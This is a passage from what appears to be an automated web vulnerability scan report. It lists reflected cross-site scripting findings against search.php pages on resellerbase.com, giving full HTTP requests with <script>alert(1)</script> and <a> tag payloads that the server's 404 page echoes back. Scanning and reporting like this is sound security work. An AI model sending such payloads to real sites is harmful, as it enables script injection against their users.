The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 12734<script>alert(1)</script>f1a52979d6a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos12734<script>alert(1)</script>f1a52979d6a/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos12734<script>alert(1)</script>f1a52979d6a/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2398. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a3155<script>alert(1)</script>808b228c490 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/imagesa3155<script>alert(1)</script>808b228c490/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/imagesa3155<script>alert(1)</script>808b228c490/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2399. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 5bd58<script>alert(1)</script>6f67f4a1ac was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/images/rating5bd58<script>alert(1)</script>6f67f4a1ac/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/rating5bd58<script>alert(1)</script>6f67f4a1ac/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2400. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload c740d<script>alert(1)</script>27ed1fc8c7e was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/images/rating/search.phpc740d<script>alert(1)</script>27ed1fc8c7e?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/rating/search.phpc740d<script>alert(1)</script>27ed1fc8c7e?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2401. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload cc7e7<a>a97644dbc8e was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchcc7e7<a>a97644dbc8e&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchcc7e7<a>a97644dbc8e&opt=2 was not found on this server.</p>
...[SNIP]...

2.2402. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c35a2<a>fe5424f19bb was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/themes/kosmos/images/rating/search.php?keyword=search...c35a2<a>fe5424f19bb&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/rating/search.php?keyword=search...c35a2<a>fe5424f19bb&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2403. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 91888<script>alert(1)</script>e5ce3b634d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&91888<script>alert(1)</script>e5ce3b634d2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&91888<script>alert(1)</script>e5ce3b634d2=1 was not found on this server.</p>
...[SNIP]...

2.2404. http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ef2ff<a>944f4a867e6 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ef2ff<a>944f4a867e6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2ef2ff<a>944f4a867e6 was not found on this server.</p>
...[SNIP]...

2.2405. http://www.resellerbase.com/detail/35/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f75ed<script>alert(1)</script>402663faa39 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf75ed<script>alert(1)</script>402663faa39/35/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf75ed<script>alert(1)</script>402663faa39/35/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2406. http://www.resellerbase.com/detail/35/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 74712<script>alert(1)</script>1cb21979b11 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3574712<script>alert(1)</script>1cb21979b11/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3574712<script>alert(1)</script>1cb21979b11/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2407. http://www.resellerbase.com/detail/35/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a3394<script>alert(1)</script>1c815d22781 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themesa3394<script>alert(1)</script>1c815d22781/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themesa3394<script>alert(1)</script>1c815d22781/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2408. http://www.resellerbase.com/detail/35/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a8c31<script>alert(1)</script>21ae6efe878 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmosa8c31<script>alert(1)</script>21ae6efe878/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmosa8c31<script>alert(1)</script>21ae6efe878/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2409. http://www.resellerbase.com/detail/35/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload cf4c5<script>alert(1)</script>0bc6187cf08 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/imagescf4c5<script>alert(1)</script>0bc6187cf08/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/imagescf4c5<script>alert(1)</script>0bc6187cf08/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2410. http://www.resellerbase.com/detail/35/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload fc4f1<script>alert(1)</script>8d85f596fd8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/images/search.phpfc4f1<script>alert(1)</script>8d85f596fd8?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/search.phpfc4f1<script>alert(1)</script>8d85f596fd8?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2411. http://www.resellerbase.com/detail/35/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 6616c<a>0974c3c21fe was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/themes/kosmos/images/search.php?keyword=search...&Submit3=Search6616c<a>0974c3c21fe&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/search.php?keyword=search...&Submit3=Search6616c<a>0974c3c21fe&opt=2 was not found on this server.</p>
...[SNIP]...

2.2412. http://www.resellerbase.com/detail/35/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload b92ce<a>e6254f636c9 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/themes/kosmos/images/search.php?keyword=search...b92ce<a>e6254f636c9&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/search.php?keyword=search...b92ce<a>e6254f636c9&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2413. http://www.resellerbase.com/detail/35/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c1031<script>alert(1)</script>ba4e18abcb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/35/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&c1031<script>alert(1)</script>ba4e18abcb7=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/35/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&c1031<script>alert(1)</script>ba4e18abcb7=1 was not found on this server.</p>
...[SNIP]...

2.2414. http://www.resellerbase.com/detail/35/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/35/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7fae8<a>f3ea3b79b99 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/35/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=27fae8<a>f3ea3b79b99 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
